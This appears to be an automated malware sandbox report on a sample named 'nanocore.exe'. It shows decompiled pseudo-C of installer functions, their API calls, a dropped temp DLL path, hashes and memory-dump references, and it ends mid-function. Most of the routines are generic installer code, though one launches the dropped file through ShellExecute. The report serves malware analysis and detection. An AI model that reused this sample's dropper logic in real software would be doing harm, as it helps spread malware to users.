            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
            • API String ID: 589700163-562438032
            • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
            • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
            • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
            • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403E0E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








            0x00403e20
            0x00403eb4
            0x00000000
            0x00403eb4
            0x00403e31
            0x00403e35
            0x00000000
            0x00000000
            0x00403e3b
            0x00403e44
            0x00403e47
            0x00403e47
            0x00403e4d
            0x00403e53
            0x00403e53
            0x00403e5f
            0x00403e65
            0x00403e6c
            0x00403e6f
            0x00403e72
            0x00403e74
            0x00403e74
            0x00403e7c
            0x00403e82
            0x00403e82
            0x00403e8c
            0x00403e91
            0x00403e94
            0x00403e99
            0x00403e9c
            0x00403e9c
            0x00403eac
            0x00403eac
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
            • String ID:
            • API String ID: 2320649405-0
            • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
            • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
            • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
            • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
            Download Yara Rule
            C-Code - Quality: 78%
            			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059BF(0x40a018,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a018, 0x40901c);
					lstrcatA(0x40a018,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405707( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






            0x00401674
            0x00401684
            0x00401688
            0x00401690
            0x004016a7
            0x004016af
            0x004016b8
            0x004016b8
            0x004016cb
            0x004016d7
            0x004026da
            0x004016ed
            0x004016f3
            0x004016f8
            0x00000000
            0x004016f8
            0x004016cd
            0x004016cd
            0x004021e8
            0x004021e8
            0x004021e8
            0x00402932
            0x0040293e

            APIs
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 00401690
            • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 0040169A
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 004016AF
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 004016B8
              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,C:\Users\user\Desktop\nanocore.exe 0), ref: 00405CA2
              • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
              • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
              • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
              • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
              • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
              • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
              • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
              • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
              • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
              • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
            • MoveFileA.KERNEL32(?,?), ref: 004016C3
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
            • String ID: C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
            • API String ID: 2621199633-2804884011
            • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
            • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
            • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
            • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404627, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00404627(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














            0x00404635
            0x00404642
            0x00404648
            0x00404686
            0x00404686
            0x00404695
            0x0040469c
            0x00000000
            0x0040469e
            0x0040464a
            0x00404659
            0x00404661
            0x00404664
            0x00404676
            0x0040467c
            0x00404683
            0x00000000
            0x00404683
            0x00000000

            APIs
            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
            • GetMessagePos.USER32 ref: 0040464A
            • ScreenToClient.USER32 ref: 00404664
            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Message$Send$ClientScreen
            • String ID: f
            • API String ID: 41195575-1993550816
            • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
            • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
            • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
            • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b020 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x789930; // 0x4e6c2
					_t7 =  *0x79d938; // 0x4e6c6
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x7898f0);
					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






            0x00402bb7
            0x00402bbf
            0x00402bcb
            0x00402bd4
            0x00402bd7
            0x00402bd7
            0x00402bdf
            0x00402be1
            0x00402be7
            0x00402bee
            0x00402bf0
            0x00402bf0
            0x00402c09
            0x00402c14
            0x00402c21
            0x00402c29
            0x00402c29
            0x00402c34

            APIs
            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
            • MulDiv.KERNEL32(0004E6C2,00000064,0004E6C6), ref: 00402BF6
            • wsprintfA.USER32 ref: 00402C09
            • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
            • SetDlgItemTextA.USER32 ref: 00402C21
            • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: TextWindow$ItemShowTimerwsprintf
            • String ID:
            • API String ID: 559026099-0
            • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
            • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
            • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
            • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
            Download Yara Rule
            C-Code - Quality: 64%
            			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








            0x00401e3c
            0x00401e45
            0x00401e47
            0x00401e4c
            0x00401e4d
            0x00401e58
            0x00401e5a
            0x00401e65
            0x00401e71
            0x00401e7f
            0x00401e91
            0x004026da
            0x004026da
            0x00402932
            0x0040293e

            APIs
            • wsprintfA.USER32 ref: 00401E5A
            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
            Strings
            • C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll, xrefs: 00401E53
            • %s %s, xrefs: 00401E4E
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ExecuteShellwsprintf
            • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
            • API String ID: 2956387742-3685331131
            • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
            • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
            • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
            • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






            0x00402af5
            0x00402afd
            0x00402b25
            0x00402b0f
            0x00402b56
            0x00000000
            0x00402b5e
            0x00402b23
            0x00000000
            0x00000000
            0x00402b23
            0x00402b3a
            0x00000000
            0x00402b46
            0x00402b50

            APIs
            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
            • RegCloseKey.ADVAPI32(?), ref: 00402B3A
            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
            • RegCloseKey.ADVAPI32(?), ref: 00402B56
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Close$DeleteEnumOpen
            • String ID:
            • API String ID: 1912718029-0
            • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
            • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
            • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
            • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







            0x00401d3e
            0x00401d45
            0x00401d74
            0x00401d7c
            0x00401d83
            0x00401d83
            0x00402932
            0x0040293e

            APIs
            • GetDlgItem.USER32 ref: 00401D38
            • GetClientRect.USER32 ref: 00401D45
            • LoadImageA.USER32 ref: 00401D66
            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
            • DeleteObject.GDI32(00000000), ref: 00401D83
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
            • String ID:
            • API String ID: 1849352358-0
            • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
            • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
            • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
            • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404545, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
            Download Yara Rule
            C-Code - Quality: 35%
            			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
			}













            0x0040454d
            0x00404551
            0x00404559
            0x0040455c
            0x0040455d
            0x0040455f
            0x00404561
            0x00404564
            0x00404564
            0x0040456b
            0x00404571
            0x00404571
            0x00404578
            0x00404583
            0x00404584
            0x00404587
            0x00404587
            0x00404594
            0x0040459f
            0x004045a2
            0x004045b4
            0x004045bb
            0x004045bc
            0x004045cb
            0x004045db
            0x004045f7

            APIs
            • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
            • wsprintfA.USER32 ref: 004045DB
            • SetDlgItemTextA.USER32 ref: 004045EE
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ItemTextlstrlenwsprintf
            • String ID: %u.%u%s%s
            • API String ID: 3540041739-3551169577
            • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
            • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
            • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
            • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
            Download Yara Rule
            C-Code - Quality: 54%
            			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
